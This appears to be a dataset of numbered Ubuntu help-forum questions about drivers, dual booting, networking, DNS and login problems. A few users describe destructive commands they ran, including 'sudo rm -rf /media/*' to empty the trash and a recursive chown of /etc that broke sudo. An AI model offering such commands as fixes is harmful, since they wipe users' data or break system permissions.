486811	nvidia driver issue , driver not in use	yesterday i 've tried to watch a 3d movie in 2d mode with xbmc when i 've noticed this would not work for me . i 've looked at some errors i got while running xbmc from command line : libva info : va-api version 0.35.0 libva info : va_getdrivername ( ) returns 0 libva info : trying to open /usr/lib/x86_64-linux-gnu/dri/nouveau_drv_video.so libva info : va_opendriver ( ) returns -1 failed to open vdpau backend libvdpau_nouveau.so : can not open shared object file : no such file or directory i have to point out that the first time i had this error , it was `` ... nvidia.so '' not nouveau - i think that changed because i 've tried to switch to nouveau and then back to nvidia . now i 'm actually unable to go back to nvidia drivers ( which sucks because up to this point i just used the `` additional drivers '' settings to switch back and forth ) . after trying that i purged the nvidia drivers because i noticed that the nvidia x server settings were installed but do not contain any settings , just the two pages application profiles and nvidia-settings configuration . i 've tried to install nvidia drivers 331.38 via the `` additional drivers '' tool , no success . additional drivers displays nvidia 331.38 as active but my xorg log clearly states that : [ 352.415 ] ( == ) matched nvidia as autoconfigured driver 0 [ 352.415 ] ( == ) matched nouveau as autoconfigured driver 1 [ 352.415 ] ( == ) matched nvidia as autoconfigured driver 2 [ 352.415 ] ( == ) matched nouveau as autoconfigured driver 3 [ 352.415 ] ( == ) matched modesetting as autoconfigured driver 4 [ 352.415 ] ( == ) matched fbdev as autoconfigured driver 5 [ 352.415 ] ( == ) matched vesa as autoconfigured driver 6 [ 352.415 ] ( == ) assigned the driver to the xf86configlayout [ 352.415 ] ( ii ) loadmodule : `` nvidia '' [ 352.495 ] ( ww ) warning , could n't open module nvidia [ 352.495 ] ( ii ) unloadmodule : `` nvidia '' [ 352.495 ] ( ii ) unloading nvidia [ 352.495 ] ( ee ) failed to load module `` nvidia '' ( module does not exist , 0 ) i 've tried to install nvidia drivers one more time but still the same errors from libva . it looks like my system uses nouveau now but nouveau is actually blacklisted inside `` /etc/modprobe.d/nvidia-331_hybrid.conf '' ( note that i have a geforce 660 ti installed - not a hybrid card ) i looked around for solutions but so far nothing seems to work . did i do something wrong somewhere ? i 'd really like to get the nvidia drivers working again and maybe even find out why my libva throws those errors . on top of this i 've just found this in my syslog ( must be from before my last nvidia reinstall because i 'm not getting these messages anymore ) : kernel : [ 50.126660 ] nvidia : module license 'nvidia ' taints kernel . kernel : [ 50.126665 ] disabling lock debugging due to kernel taint kernel : [ 50.130161 ] nvidia : module verification failed : signature and/or required key missing - tainting kernel kernel : [ 50.134126 ] nvrm : the nvidia probe routine was not called for 1 device ( s ) . kernel : [ 50.134130 ] nvrm : this can occur when a driver such as : kernel : [ 50.134130 ] nvrm : nouveau , rivafb , nvidiafb or rivatv kernel : [ 50.134130 ] nvrm : was loaded and obtained ownership of the nvidia device ( s ) . kernel : [ 50.134133 ] nvrm : try unloading the conflicting kernel module ( and/or kernel : [ 50.134133 ] nvrm : reconfigure your kernel without the conflicting kernel : [ 50.134133 ] nvrm : driver ( s ) ) , then try loading the nvidia kernel module kernel : [ 50.134133 ] nvrm : again . kernel : [ 50.134136 ] nvrm : no nvidia graphics adapter probed ! kernel : [ 50.134137 ] [ drm ] module unloaded kernel : [ 50.134203 ] nvrm : nvidia init module failed ! thanks for reading , if you think important information is missing please let me know . all links and further information about this are welcome ( because this is driving me nuts ! ) : )
486812	app for ubuntu touch	i 've implemented an application for ubuntu touch , using qml . how can i create a `` package '' ( something like apk in android ) for the app ?
486818	how to duplicate two displays of three in total in ubuntu 14.04 ?	two displays , which i want to make mirror , have the same resolution ( 1920x1080 ) . one of them is tv on a wall : ) it 's not very comfortable to move content to tv each time , because it 's behind me . i do n't watch it when i use the first 1080p display so it would be better , if it just copies the other one . there is `` mirror '' option in standart gui , but it 's for all displays ( i want for 2 of 3 ) .
486819	ca n't login after running startx	think i have totally messed my system up , and it 's a case of lesson learned for not reading things correctly maybe . for some reason my gui stopped loading after logging into ubuntu 12.04 , think i have misinterpreted this post command startx run my default gnome classic and gnome statup scripts also runs . as i ran this using sudo startx but was presented with a blank screen , so i restarted and tried to login as my user but it just loops back to the login page every time now i do n't know what to do to get access back into my laptop if anyone could help i would be so grateful edit followed this post and now i can login , lesson learned , but still no gui
486821	url_helper.py warning can not route to host . ubuntu server	when booting a node via pxe i keep getting url_helper.py [ warning ] saying it cant route to host , my master node/controller has 2 interfaces . 1 for nodes , 2 internet access . what can i do to allow the nodes to connect through the controller during pxe boot ? thanks~ jz image : http : //i.imgur.com/uoemlfn.jpg
486822	which file has the mapping for alt+f2 in gnome 3.4.2 ?	hello linux community , which file has the mapping for alt+f2 in gnome 3.4.2 ? i have firefox and used to type it for access it . now i type it and i get iceweasel . this happened after an update . is there a settings file somewhere ; if so , where is it ? i tried looking at custom keyboard shortcuts but it shows empty . thanks .
486824	ubuntu 14.04 , problem installing package skype : i386	i have some problems with my ubuntu 14.04 . i can get both wireless and wired internet with it . it is also very slow to start . when i performed any actions like update , upgrade or install , it will show me this message . w : you may want to run apt-get update to correct these problems e : the package skype : i386 needs to be reinstalled , but i ca n't find an archive for it . how can i solve those issues ?
486826	ubuntu install has frozen .	so i am installing ubuntu 14.04 alongside windows . so i click install alongside windows , i did n't connect to internet then i clicked install now . all i see is the waiting symbol and i am still on the partitioning screen . the cd has stopped moving and i am just sitting here waiting for something to happen help .
486827	bind9 dlz with postgresql fails : driver named 'postgresql ' not found	ui 'm in need of bind9 with postgresql support for dlz ( i 've used this post : http : //ubuntuforums.org/showthread.php ? p=11380598 ) but even after successful compilation and installation of all packages i get error about not finding postgresql driver : part of my /var/log/syslog [ ... ] jun 22 16:38:22 rei-01 named [ 13985 ] : starting bind 9.9.5-3-ubuntu -u bind jun 22 16:38:22 rei-01 named [ 13985 ] : built with ' -- prefix=/usr ' ' -- mandir=/usr/share/man ' ' -- infodir=/usr/share/info ' ' -- sysconfdir=/etc/bind ' ' -- localstatedir=/var ' ' -- enable-threads ' ' -- enable-largefile ' ' -- with-libtool ' ' -- enable-shared ' ' -- enable-static ' ' -- with-openssl=/usr ' ' -- with-gssapi=/usr ' ' -- with-gnu-ld ' ' -- with-dlz-mysql=yes ' ' -- with-dlz-posgres=yes ' ' -- with-dlz-filesystem=yes ' ' -- with-dlz-ldap=yes ' ' -- with-dlz-stub=yes ' ' -- with-geoip=/usr ' ' -- with-atf=no ' ' -- enable-ipv6 ' ' -- enable-rrl ' ' -- enable-filter-aaaa ' 'cflags=-fno-strict-aliasing -ddig_sigchase -o2' jun 22 16:38:22 rei-01 named [ 13985 ] : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- jun 22 16:38:22 rei-01 named [ 13985 ] : bind 9 is maintained by internet systems consortium , jun 22 16:38:22 rei-01 named [ 13985 ] : inc. ( isc ) , a non-profit 501 ( c ) ( 3 ) public-benefit jun 22 16:38:22 rei-01 named [ 13985 ] : corporation . support and training for bind 9 are jun 22 16:38:22 rei-01 named [ 13985 ] : available at https : //www.isc.org/support jun 22 16:38:22 rei-01 named [ 13985 ] : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- jun 22 16:38:22 rei-01 named [ 13985 ] : adjusted limit on open files from 4096 to 1048576 jun 22 16:38:22 rei-01 named [ 13985 ] : found 4 cpus , using 4 worker threads jun 22 16:38:22 rei-01 named [ 13985 ] : using 4 udp listeners per interface jun 22 16:38:22 rei-01 named [ 13985 ] : using up to 4096 sockets jun 22 16:38:22 rei-01 named [ 13985 ] : loading configuration from '/etc/bind/named.conf' jun 22 16:38:22 rei-01 named [ 13985 ] : reading built-in trusted keys from file '/etc/bind/bind.keys' jun 22 16:38:22 rei-01 named [ 13985 ] : using default udp/ipv4 port range : [ 1024 , 65535 ] jun 22 16:38:22 rei-01 named [ 13985 ] : using default udp/ipv6 port range : [ 1024 , 65535 ] jun 22 16:38:22 rei-01 named [ 13985 ] : listening on ipv4 interface lo , 127.0.0.1 # 53 jun 22 16:38:22 rei-01 named [ 13985 ] : listening on ipv4 interface eth0 , 192.168.1.200 # 53 jun 22 16:38:22 rei-01 named [ 13985 ] : generating session key for dynamic dns jun 22 16:38:22 rei-01 named [ 13985 ] : sizing zone task pool based on 0 zones jun 22 16:38:22 rei-01 named [ 13985 ] : loading 'postgres zone ' using driver postgres jun 22 16:38:22 rei-01 named [ 13985 ] : unsupported dlz database driver 'postgres ' . postgres zone not loaded . jun 22 16:38:22 rei-01 named [ 13985 ] : loading configuration : not found jun 22 16:38:22 rei-01 named [ 13985 ] : exiting ( due to fatal error ) bind9 was build with postgresql dlz support as this line shows it : jun 22 16:38:22 rei-01 named [ 13985 ] : built with ' -- prefix=/usr ' ' -- mandir=/usr/share/man ' ' -- infodir=/usr/share/info ' ' -- sysconfdir=/etc/bind ' ' -- localstatedir=/var ' ' -- enable-threads ' ' -- enable-largefile ' ' -- with-libtool ' ' -- enable-shared ' ' -- enable-static ' ' -- with-openssl=/usr ' ' -- with-gssapi=/usr ' ' -- with-gnu-ld ' ' -- with-dlz-mysql=yes ' ' -- with-dlz-posgres=yes ' ' -- with-dlz-filesystem=yes ' ' -- with-dlz-ldap=yes ' ' -- with-dlz-stub=yes ' ' -- with-geoip=/usr ' ' -- with-atf=no ' ' -- enable-ipv6 ' ' -- enable-rrl ' ' -- enable-filter-aaaa ' 'cflags=-fno-strict-aliasing -ddig_sigchase -o2' but this shows bind9 can not find the driver jun 22 16:38:22 rei-01 named [ 13985 ] : unsupported dlz database driver 'postgres ' . postgres zone not loaded . so my question is : is it broken or maybe i did something wrong ? if i did something wrong is there any good howto saying step-by-step how to make it work .
486829	wireless adapter	i use lubuntu and i have an usb wireless adapter nano lynx aulub155u2 ( ralink rt5370 ) . lubuntu detect my wireless adapter and my wifi connection . my problem is when i try to connect in it . always that i try to connect , the panel restart and the connection doesnt begin . in other distro i dont have any problem with my wireless adapter what can i do ?
486833	no csh or tcsh ?	in /bin , i see bash , but no csh or tcsh . when i created a `` .cshrc '' file in my home directory , it had no effect ; that 's how i discovered this problem . so the question is this : how do i switch to csh/tcsh type of login ? thanks for your help .
486834	how to install netgear wna1100 wirless adapter on ubuntu ?	i searched google a lot but i am unable to figure out any thing which works.. please help if anyone has any idea ubuntu website says : download the last version of the http : //sourceforge.net/projects/ath9 ... htc-installer/ and execute the .deb packet . connect the wifi adapter but the link mentioned does n't works ! ! please help !
486837	how to install windows 7 in a pc running ubuntu 14 ?	i moved to ubuntu 14 and love everything about it , that is of course until i recently got a job . it has a strict windows 7 eco system . they do everything there and i personally am saddened but i need to join the club . anyway , i would like to know how to install windows 7 , whilst keeping ubuntu and its information ( dual boot ) .
486840	windows 8.1 partition not visible in ubuntu 14.04 installation	while configuring the partitions in installation of ubuntu , it did n't show any of the partitions i have made in 8.1 , neither primary or logical drive nor unallocated space of 50gb ( made for ubutu ) . how to make windows partitions visible in ubuntu installation & will 50gb space be sufficient for proper functioning of ubuntu ?
486841	corrupted hard drive - how can i rescue my files ?	lets get things straight : i 'm a bit of a noob . my ubuntu system was not working well , so i went on the live cd and checked the system , everything went smoothly . so rebooted it without the live cd and once again it would not work . so i repeated said process , but the system check was taking a long time , so i cancelled it midway through , despite the warning that it could corrupt the drive ( i know , i 'm stupid ) . so now it gets to the ubuntu purple screen , with 5 dots that normally light on and off as it loads , and it just freezes there . what can i do to retrieve the system with my data ? i have got everything backed up by ubuntu one , and saved to a usb now it is being discontinued , but have one very important document that for some reason ubuntu one wasnt synced to save . thanks in advance
486844	error : could not set the configuration for crtc 64 any idea ?	i was working on ubuntu 12.04 doing my opengl programming nio problem , only problem was that i needed to use nvidia prime ( laptop here ) and backport it to 12.04 double monitor was not supported . i got tired of not using the second monitor so in another partition i installed 14.04 ( where nvidia prime shuld be fully supported ) everything works fine i can compile my opengl stuff etc . i just get this error when i start from reboot '' could not set the configuration for crtc 64 '' and then them monitor are freaked out . i can reset the monitor everytime i log but i would rater fix it . the only thing i found online was to delete the monitor.xml which doesnt resolve anything , just remove the config . anyone got any idea ? ps : i can set the monitor no problem from screen setting , but if i open nvidia settings it shows only one monitor of size 3840x1080 rather then two 1920x1080 . any help much appreciated . cheers m .
486846	make ntfs automount even more `` auto ''	i have dual boot ubuntu/windows . i have one relatively small ntfs partition for win , one ext4 for ubuntu and one big ntfs for data that 's shared between the systems . i like that the ntfs partitions are automounted by default in ubuntu . but it 's not as `` auto '' as i 'd like it to be . let me explain . i have some folders on data partition which are synced to dropbox ( i have soft links in ~/dropbox for each folder i want to sync ) . also , i use spotify premium and i keep downloaded songs on data partition because it takes like 20-30 gb and the ubuntu partition is too small for that . problem is that the partition is n't mounted until i first open it in the explorer ( or however it 's called in ubuntu ) . so when i boot up , i ca n't start spotify until i open the data partition but even worse , dropbox sync freaks out because it ca n't see those folders and it deletes them from dropbox , which is n't good . i can come up with million other cases when this is pain in the ass . so , my question is , is there a way to make the automount true `` auto '' ? thanks
486847	how to install libmudflap in 64-bit 14.04 `` trusty ''	i wish to demonstrate mudflap working on this program , int main ( ) { int tab [ 10 ] ; int i ; for ( i = 1 ; i < = 10 ; i++ ) tab [ i ] = 0 ; return 0 ; } but i get an error , $ gcc -fmudflap -lmudflap bounds-violation.c in file included from < command-line > :0:0 : /usr/include/stdc-predef.h:59:1 : fatal error : mf-runtime.h : no such file or directory # endif ^ compilation terminated . so i need the mudflap libraries . but there does n't appear to exist an appropriate library for my x86_64 platform : $ uname -a linux orca 3.13.0-29-generic # 53-ubuntu smp wed jun 4 21:00:20 utc 2014 x86_64 x86_64 x86_64 gnu/linux $ apt-cache search mudflap lib64mudflap0-dbg-powerpc-cross - gcc mudflap shared support libraries ( 64 bit debug symbols ) lib64mudflap0-powerpc-cross - gcc mudflap shared support libraries ( 64bit ) libhfmudflap0-armel-cross - gcc mudflap shared support libraries ( hard float ) libhfmudflap0-dbg-armel-cross - gcc mudflap shared support libraries ( hard float debug symbols ) libmudflap0-4.7-dev-armel-cross - gcc mudflap support libraries ( development files ) libmudflap0-4.7-dev-armhf-cross - gcc mudflap support libraries ( development files ) libmudflap0-4.8-dev-armhf-cross - gcc mudflap support libraries ( development files ) libmudflap0-4.8-dev-powerpc-cross - gcc mudflap support libraries ( development files ) libmudflap0-armel-cross - gcc mudflap shared support libraries libmudflap0-armhf-cross - gcc mudflap shared support libraries libmudflap0-dbg-armel-cross - gcc mudflap shared support libraries ( debug symbols ) libmudflap0-dbg-armhf-cross - gcc mudflap shared support libraries ( debug symbols ) libmudflap0-dbg-powerpc-cross - gcc mudflap shared support libraries ( debug symbols ) libmudflap0-powerpc-cross - gcc mudflap shared support libraries libsfmudflap0-armhf-cross - gcc mudflap shared support libraries ( soft float ) libsfmudflap0-dbg-armhf-cross - gcc mudflap shared support libraries ( soft float debug symbols ) why all the arm and armel stuff ? searching on the net suggestions there should be a package called libmudflap0-4.8-dev , corresponding the preinstalled version of gcc in trusty , but it does n't exist . is this a bug ? if not , how to i install libmudflap ? thanks .
486848	installation help	i downloaded ubuntu , and now have a ubuntu folder in `` programs '' on my c drive . it has an install icon in the foldeer , but it does n't do anything . what do i do next to install ubuntu ?
486851	windows 7 en dual boot with ubuntu i havent ' the menu	i have installed ubuntu 12 and i have this : i have installed windows 7 and i have this then i lost ubuntu i have done like in this video youtube.com/watch ? v=sxzrjjpjic8 so i get ubuntu and i lost wondows , now i have repair windows : bootrec/fixmbr bootrec/fixboot my question : please , how can i get a list of choice of sys at the begining ? i acced only to windows for the moment ; ( thanks a lot . best regards .
486852	ca n't empty trash after external drive was unplugged	i 've taken an usb hard drive of my teacher and now i 've returned it him back . it was ntfs and i deleted some files there . now my trash icon is still full , while the trash is empty . how to make the icon empty and correct . i 've always tried following commands sudo rm -rf /media/* sudo rm -rf ~/.local/share/trash/* but there is still no result
486856	best video configuration to use mencoder to compress mpeg2 ts files	i have a lot of files in mpeg2 ts format , from vdr . i want to use mencoder to compress them , and the avi container ( i will see mkv a next time ) . i want to use also a generic mpeg4 coder : there is xvid , x264 and lavc . i have a lot of cpu-time and a lot of disk space , i would the better quality for the video . ( i will use mp3 for the audio stream ) . what is your best configuration to do this ? what is the order of quality about workable video coder ? at this time , i use this command '' mencoder filein.ts -o fileout.avi -of avi \ -oac mp3lame -lameopts fast : preset=standard \ -ovc xvid -xvidencopts bitrate=1225 : pass=2 : threads=4 '' i do n't know how to choose the bitrate of xvid , i do n't want too large file ( not bigger as mpeg2 file ; ) ) and i have mpeg2 ts in hd mode , i think basically this is same command ( there are more pixels , that 's all ... ? ) thanks !
486858	ca n't mount/format internal hard drive	i 've been trying to use this guide to install a permanently mounted hard drive to store media on : https : //help.ubuntu.com/community/installinganewharddrive so far i 've come up with next to nothing . bios detects the hard drive . if i put in sudo lshw -c disk i get this : milo @ dante : ~ $ sudo lshw -c disk *-disk description : ata disk product : kingston sv300s3 physical id : 0.0.0 bus info : scsi @ 2:0.0.0 logical name : /dev/sda version : 520a serial : 50026b723c03ed66 size : 111gib ( 120gb ) capabilities : gpt-1.00 partitioned partitioned : gpt configuration : ansiversion=5 guid=8c17e47b-ba42-4724-bc20-cc1cc2f22b83 sectorsize=512 *-cdrom description : dvd-ram writer product : drw-24f1st a vendor : asus physical id : 0.0.0 bus info : scsi @ 3:0.0.0 logical name : /dev/cdrom logical name : /dev/sr0 logical name : /media/milo/disk version : 1.00 capabilities : removable audio cd-r cd-rw dvd dvd-r dvd-ram configuration : ansiversion=5 mount.fstype=udf mount.options=ro , nosuid , nodev , relatime , uid=1000 , gid=1000 , umask=77 , iocharset=utf8 state=mounted status=nodisc *-disk description : ata disk product : wdc wd10ezrx-00l vendor : western digital physical id : 0.0.0 bus info : scsi @ 5:0.0.0 logical name : /dev/sdb version : 01.0 serial : wd-wcc4j2417140 size : 931gib ( 1tb ) capabilities : partitioned partitioned : dos configuration : ansiversion=5 sectorsize=4096 signature=2f65c4e4 so ubuntu detects the drive ( last one ) . i used sudo fdisk /dev/sdb to make a single partition . that seemed to be ok and rerunning it now there is a partition showing on the drive . however when i run this line to format the drive : sudo mkfs -t fat32 /dev/sdb i get this error : milo @ dante : ~ $ sudo mkfs -t fat32 /dev/sdb1 mkfs.fat32 : no such file or directory so now the drive ca n't be found anymore ? sudo fdisk -l gives this ( excluding other hard drives ) : disk /dev/sdb : 1000.2 gb , 1000204886016 bytes 81 heads , 63 sectors/track , 382818 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x2f65c4e4 device boot start end blocks id system /dev/sdb1 2048 1953525167 976761560 83 linux can anyone help as i 'm lost .
486859	how to configure openvpn with only ipv6 ?	i have a 14.10 server with openvpn 2.3.x how to configure it for ipv6 ? ( i have a natted ipv4 that can not be port forwarded . ) i wish to be able to receieve vpn connecions from android openvpn client . this guide would be great , https : //help.ubuntu.com/14.04/serverguide/openvpn.html if there was a ipv6 version : )
486860	create an alias to a desidred directory to use within terminal	i constantly need to type cd /home/geo/geant4/geant4.10.00.p02-install/lib/geant4-10.0.2 how do i create an alias to that directory so i could just type cd $ geant ( or any other word i decide to create as the alias name ) it would also help me whenever i need to use cmake because i could use $ geant aswell in the middle of an cmake option thanks
486862	in the beginning launching a game is very slow , but then ubuntu gets used to it	when i first launch dota2 , it takes about 2-3 min to go in the main screen , and another 3-4 min to join the game . alt+tabbing is quite slow first to open firefox for example , taking about 2-3 min . but after 5-6 alt+tabs it gets faster and faster . then it has normal speed . is there a way to fix this ?
486863	ubuntu virtual machine guest-only internet	disconnecting internet is a great security advise but i want to check my emails . is that possible to use ubuntu as host without internet connection while in a guest os in virtualbox is able to browse internet ? that way ubuntu host remain secure
486864	ubuntu 12.04 lts - does n't startup after login screen	i can login to the guest session , but with username/password - it gets stuck forever . is there a way to resolve this problem ? if i need to install ubuntu again , how can i access my files ? please tell me how can i access/copy my files before i attempt to clean install ? can i use safe mode ( how ) to retrieve my folders ?
486865	asus 1005pe runs hotter and drains the battery quicker since installing 14.04	since migrating to 14.04 , my asus eee pc 1005pe laptop runs very hot and the battery seems to drain faster . i believe it may be attributable to the loss of the jupiter application that replicated the asus-created application available when running windows . i am aware the jupiter code is no longer supported/available on 14.04 , are there other applications available that could provide the same or similar feature set as jupiter ? thank you in advance for your thoughtful response and assistance .
486866	grub update ca n't detect hybernating windows partition	i 've kinda wound myself into some weird paradox . i have windows 8.1 and ubuntu 14.04 installed on two different hds . both are 64 bit . i just recently deleted and reinstalled ubuntu , but update-grub and os-prober ca n't find my windows partition . i thought maybe it was damaged so i ran ntfsfix /dev/sda2 ( where windows is installed ) and got the error windows is hibernated , refused to mount . i 've already tried going into my bios/uefi settings on my motherboard , but my motherboard does n't detect the drive anymore either . i can still see the drive when i run gdisk or gparted . i tried boot-repair , but that actually made ubuntu completely unbootable . i had to chroot from my live usb and reinstall grub2 so i could even ask this question . so all this together leaves me in between a rock and a hard place . how do i boot into windows to unhibernate windows so grub2 can detect windows and add windows as a bootable option in grub ?
486867	firefox problems	i am running ubuntu 14.04 , i do n't know what i did but firefox will not open from the icon , i have to type in the terminal for it to open . i have tried suds firefox -p and everything else that i have seen posted on this forum and non of it works . any ideas on how i can fix this firefox problem ?
486868	chromium can not import bookmarks in other language ?	i saved ff bookmarks in html then imported into chromium , but the bookmarks i saved in other languages wo n't display properly . the bookmarks are still there , but the title and description ( in another language - japanese , korean , chinese , etc.. ) are blank . can anyone help me get it fixed without having to recreate each bookmark in chromium ?
486873	after adding .desktop file , the menu option does not start the application	i 'm using lubuntu , and have added the text file myapp.desktop to /usr/share/applications . i want the file to start an application , but instead it only launches the lxterminal . here is the myapp.desktop file . [ desktop entry ] version=1.0 name=sage comment=sage math categories=development exec=/home/tim/downloads/sage-6.2-x86_64-linux/sage terminal=true type=application name [ en_us ] =sage math genericname [ en_us ] =sage math comment [ en_us ] =open source math software by the way , if i type the application path into lxterminal , then the application does start correctly . perhaps i 'm missing something from the file i wrote ? any help greatly appreciated .
486874	mouse cursor scaling issues in xubuntu 14.04 with xfce 4.10	i am using xubuntu 14.04 with xfce 4.10 and i just recently bought a seiki 39 ' 4k display for home . while i think that the display itself is working great so far and i love it , i am noticing some small quirks with the window manager or the desktop ( i 'm not sure exectly which ) . one of these quirks is that the mouse cursor changes sizes depending on what it is hovering over on the screen . see below a few different examples on thunderbird , chrome and over the desktop . i did n't have this cursor scaling issue when i used a 1080p ( 1920x1080 ) screen and it started to happen when i connected the 4k screen . is there a way for me to configure a uniform cursor size across all screens ?
486875	apache 2 with domain server not found	i have a domain at nitrado.net and put the * and @ wildcard to a vservers ip . on the vserver is apache2 etc installed . it worked before 2-3 minutes but i had to reinstall apache2 and now , when i acces website from ip its fine but when i try to acces it with the domain it says server not found . has anyone a fix for that ? mfg
486876	restart not working in trusty	i recently installed a 14.04 over an old 13.04 install . everything is running smoothly , but for some odd reason , whenever i tell it to reboot ( graphically , reboot or otherwise ) , it just shuts down without actually rebooting . i find this behavior rather annoying . does anyone know how to fix this ?
486877	how can you delete a folder/file/etc . on a read only dvd+r ?	i was trying to get my cd mounted ( that problem got fixed ) , but i burned something to my cd as a test and now i ca n't get it off .
486878	sound coming out of headphones and speakers !	i 'm new at ask ubuntu , but not at ubuntu itself ! so , i have a dell latitude d520 with ubuntu 12.04.4 on it . when i plug in my headphones , sound comes out from the headphones and the speakers ! i tried to enable automute , but then my speakers did n't work . it 's kinda getting on my nerves because i ca n't listen to my dubstep ... can somebody help ?
486885	what is x11rdp ?	i have been using xrdp for sometime now ( along with vnc4server ) and i think i understand high-level overview of its working as described here . xrdp allows to communicate with rdp protocol and uses sesman for user authentication . after authentication a new/existing vnc session is used for remote display . however , there is no description of x11rdp in the above process . i do see an option with name sesman-x11rdp on the login screen , which never works . i tried to look for the explanation of x11rdp on xrdp.org . all i could find is this : `` xrdp uses xvnc or x11rdp to manage the x-session '' . can someone explain what is x11rdp and how it is different from xvnc ? what are the pros/cons of using x11rdp over xrdp-vnc ? ps : i could find a lot of tutorials on how to install/compile x11rdp . but , i first want to understand its purpose before going through the process of compiling/installing .
486888	using a2dp with bluetooth headset but still getting distorted sound	i have installed pavucontrol and now my bluetooth headset works . i chose a2dp sound mode but it still gives me distorted sound . it is a lot better with android or windows . what can i do to fix this ? thakns !
486892	unity closing windows while process still running	windows i 'm using will randomly close and then the processes for those windows will still be running in the system . i 'm using ubuntu 14.04 .
486896	samsung scanner scx 3205w doesn`t work on ubuntu 14.04	i have a multifunction device printer\scanner samsung scx 3205w . the printer works normally , but the scanner can not be recognized or found through the usb . i`m new on ubuntu but my last laptop was hp probook and a did this easily using the ubuntu forum , so the scanner works on this hp . today i have thinkpad e440 and nothing help , the scanner is still not working . please any suggestions ? thanks
486897	how to set a launcher icon from .exe files ?	can i set an icon for a .desktop file to be an .exe file , and if so - how ? i have tried to point the icon entry in the file to a path of an .exe file , to no avail - the launcher shows no icon ( question mark ) , while nautilus shows the icon when browsing the containing folder .
486898	cairo dock blinking when mouse over	i recently installed cairo dock on ubuntu 14.04 and it seems to have a problem , when i hover my mouse over it , or move around it the icons start blinking/tilting like it is having problems rendering them , it 's kind of annoying and i 'm almost sure it has something to do with me having selected using opengl during installation . it said something about reducing cpu load but that might cause trouble . the thing is i ca n't find any options to disable it , and i even tried uninstalling it and reinstalling it but the problem persists .
486899	which recent tablet/notebook convertible pcs run ubuntu 14.04 lts flawlessly ?	i’m an ubuntu newbie , and i’m interested in acquiring a tablet/notebook convertible pc that will run ubuntu 14.04 lts without lots of hardware incompatibility and driver tweaking hassles . in researching my options , i notice that there is a section of the official ubuntu website called ... • ubuntu desktop certified hardware » http : //www.ubuntu.com/certification/desktop/ ... that uses the hardware categories ‘desktops’ and ‘laptops’ . i note that search terms such as ‘tablet’ , ‘convertible’ , and ‘hybrid’ return no results there . although the ‘ubuntu desktop certified hardware’ introduction page says , “each new release of ubuntu brings exciting new hardware to ubuntu users . take a look at certified hardware by release , ” the only release for which it contains data is ubuntu 12.04 lts . while it covers older convertibles , such as the dell latitude xt3 ( release date : april 2012 ) ... “the dell latitude xt3 laptop with the components described below has been awarded the status of certified for ubuntu . releases : ubuntu 12.04 lts 32-bit . certification : this system was tested using the ubuntu 12.04 lts beta 2 image” » http : //www.ubuntu.com/certification/hardware/201104-7784/ ... it doesn’t seem to cover more recent convertibles , such as the acer aspire r7-572 ( release date : november 2013 – only acer model covered : acer aspire one , release date : july 2008 ) , or indeed more recent versions of the os , such as ubuntu 14.04 lts trusty tahr . so on first impressions , the ‘ubuntu desktop certified hardware’ section seems to be about two years out of date , which prompts me to ask two questions . are there plans to bring the ‘ubuntu desktop certified hardware’ section of the official ubuntu website up to date ? are there more up-to-date ubuntu-related resources online for gauging which recent tablet/notebook convertible pcs run ubuntu 14.04 lts flawlessly ?
486900	building burg images for efi64	i 'm trying to build burg for efi64 , as no ppa contains burg for efi systems . i managed to build it in a local directory inside of my home , but now i do n't know what to do . how do i generate all the stuff that is needed in /boot/burg for it to boot ? will it be able to boot off a btrfs partition or should i copy the kernel to the efi partition ? how do i generate the efi image that i need to put in the efi partition ? this is the list of the built files : http : //paste.ubuntu.com/7687556/ thanks .
486902	24gb ssd large hdd partitioning	first , i 've read the recommended q/as , so please do n't mark this duplicate without a close reading . i 've installed ubuntu 14.04 to the ssd , along with a swap partition . ( there will not be any other os at this time ) i 'm looking at https : //help.ubuntu.com/community/partitioning/home/moving and getting ready to follow its recommendations . i 'm wondering if i need to start with step one of if i should use a subset of the instructions . i 'm asking because when i boot the hdd already shows as mounted under media/ should i start with `` setup fstab '' section since i already have the partitions ? do i even need that section since it appears it 's already mounting at boot time ? should i go straight to `` copy /home to new partition '' ? thanks .
486903	is this possible to uninstall one package during another package is installing	is this possible when i installing one package i allow to uninstall another package at the same time ?
486905	steam glitch on ubuntu 13.10	i have tried steam -- reset it restarts after first boot , then at the end of the output it says : finished uploading minidump ( out-of-process ) : success = yes response : crashid=bp-20b488b7-d595-46a1-84e3-ea5672140622 finished uploading minidump ( out-of-process ) : success = yes response : crashid=bp-252c58cc-d764-4383-adba-867832140622 i have tried reinstalling it , resetting the preferences , and even manually installing it but it still shows the error from above
486907	64 bit download or mac ( amd ) download for hp win 7 laptop amd 8 quad core processor ? thanks !	i am a bit confused . i have a two year old hp dv7 pavilion laptop running windows 7 home premium on a 720 gb hard drive with 77 gb free . the laptop runs an amd a8 quad core processor . which version of ubuntu 14.04 do i download and try to install ? atruefriend is my user name here and also at gmail . i thank you in advance and hope to meet someone who lives near sun city or menifee , calif 92586 . i can also drive into temecula , hemet , perris or near by area and buy you coffee , as it has been many years since i looked at linux and that was red hat 5 and 6 . bobby ray
486909	ubuntu 14.04 login screen password always incorrect	i have just installed ubuntu 14.04 for the first time woot . i am a long time windows user and dont like where windows is headed so i decided to switch to ubuntu and only use windows for gaming . however . i can not get into my computer after the lock screen appears . it says the invalid password message no matter what password i use . i have googled for a little bit , and the closest thing on here i can find is : password is incorrect - when tried to login into ubuntu 13.04 though there is no answer there . i should note , that i mistakenly as a linux newb , did chown -r david /etc and lost the sudo power , then i booted into recovery mode and ran a few things and ran chown -r root : root /etc and that fixed the sudo problem . but i think when i did that the lock screen stopped working and i cant get into the computer . i have to restart and have it auto login . any help would be great . if this is a duplicate , im sorry , i went through the first 10 suggestions when posting this and nothing close helped . thanks , newby david
486910	how to turn on touch pad disable or enable double tap led ?	i have a synaptic touch pad witch led in right corner , in windows when i tap two times on led its start blinking and touch pad turn off . on google i found many post these points on web which is offline i found this but i do n't known what i must do with these files can any one write a instruction for me ? ps . im using a ubuntu gnome 14.04 sorry for my bad english
